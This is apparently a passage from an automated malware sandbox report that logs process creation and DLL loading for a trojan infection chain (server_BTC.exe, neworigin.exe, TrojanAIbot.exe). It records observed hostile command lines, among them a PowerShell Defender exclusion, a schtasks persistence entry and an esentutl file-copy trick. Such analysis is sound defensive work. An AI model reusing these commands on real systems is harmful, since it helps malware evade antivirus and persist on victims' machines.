                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dllJump to behavior
